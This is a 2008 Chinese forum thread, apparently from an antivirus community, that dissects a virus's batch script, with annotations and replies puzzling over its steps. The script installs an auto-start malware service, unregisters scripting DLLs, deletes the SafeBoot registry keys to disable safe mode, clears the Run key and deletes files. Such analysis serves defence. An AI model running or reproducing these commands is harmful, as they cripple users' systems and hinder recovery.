流星陨落 - 2008-6-2 12:41:00
yojlqqzjowe
breziwbgn
lppenbcwgly
kwmdluupbt
date 2004-08-17(返回日期)
time 20:00:00(返回时间)
ping 127.0.0.1 -n 5(ping自己,发5个包)
sc.exe create yahbfveaczn BinPath= "C:\WINDOWS\system32\yahbfveaczn.exe -k_ill" type= own type= interact start= auto DisplayName= bwsgzyeqez(sc创建病毒文件,类型是互相启动,显示名字bwsgzyeqez)
sc.exe description yahbfveaczn sszkzcbtasoljspzqkjlskajcreqdyvqosvdqquhvmtypjelg(对文件描述)
regsvr32.exe /u /s scrrun.dll(反注册该文件,scrrun.dll用于阅读和编写脚本和文本文件)
regsvr32.exe /u /s shimgvw.dll(反注册该文件,shimgvw.dll用于图像显示的COM接口程序)
regsvr32.exe /u /s itss.dll(反注册该文件,itss.dll是微软Microsoft储存系统相关文件)
regsvr32.exe /u /s vbscript.dll(反注册该文件,vbscript.dll是VBScript脚本相关支持文件,让大家的QQ空间等不能使用)
regsvr32.exe /s jscript.dll(反注册该文件,jscript.dll是Microsoft JavaScript脚本支持相关文件,让大家的QQ空间等不能使用)
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F(让系统蓝屏和无法进入安全模式)
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
sc.exe start yahbfveaczn(启动病毒)
time 11:26:53
date 2008-06-02
del "C:\WINDOWS\system32\JDKFYPU.exe" /F(删除病毒文件,/F是强制删除只读文件)
del %0
del "C:\WINDOWS\Media\Windows XP 开始.wav"(删除系统声音)
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
ping 127.0.0.1 -n 16(ping自己,发送16个包)
del "C:\WINDOWS\system32\JDKFYPU.exe" /F
del %0
exit(退出)
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; MAXTHON 2.0)
tjcum210210 - 2008-6-3 20:16:00
C:\WINDOWS\system32\yahbfveaczn.exe -k_ill
-k_ill是啥意思,这个服务看着好眼熟哦
tjcum210210 - 2008-6-3 20:26:00
找到了
该样本来自卡饭,由网友qq8230 提供
附件:
EZJ34FXK4S.rar
光记啊 - 2008-6-11 15:31:00
del "C:\WINDOWS\Media\Windows XP 开始.wavdel "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
不明白删除系统声音对病毒:default27: :default27: 有什么用
© 2000 - 2024 Rising Corp. Ltd.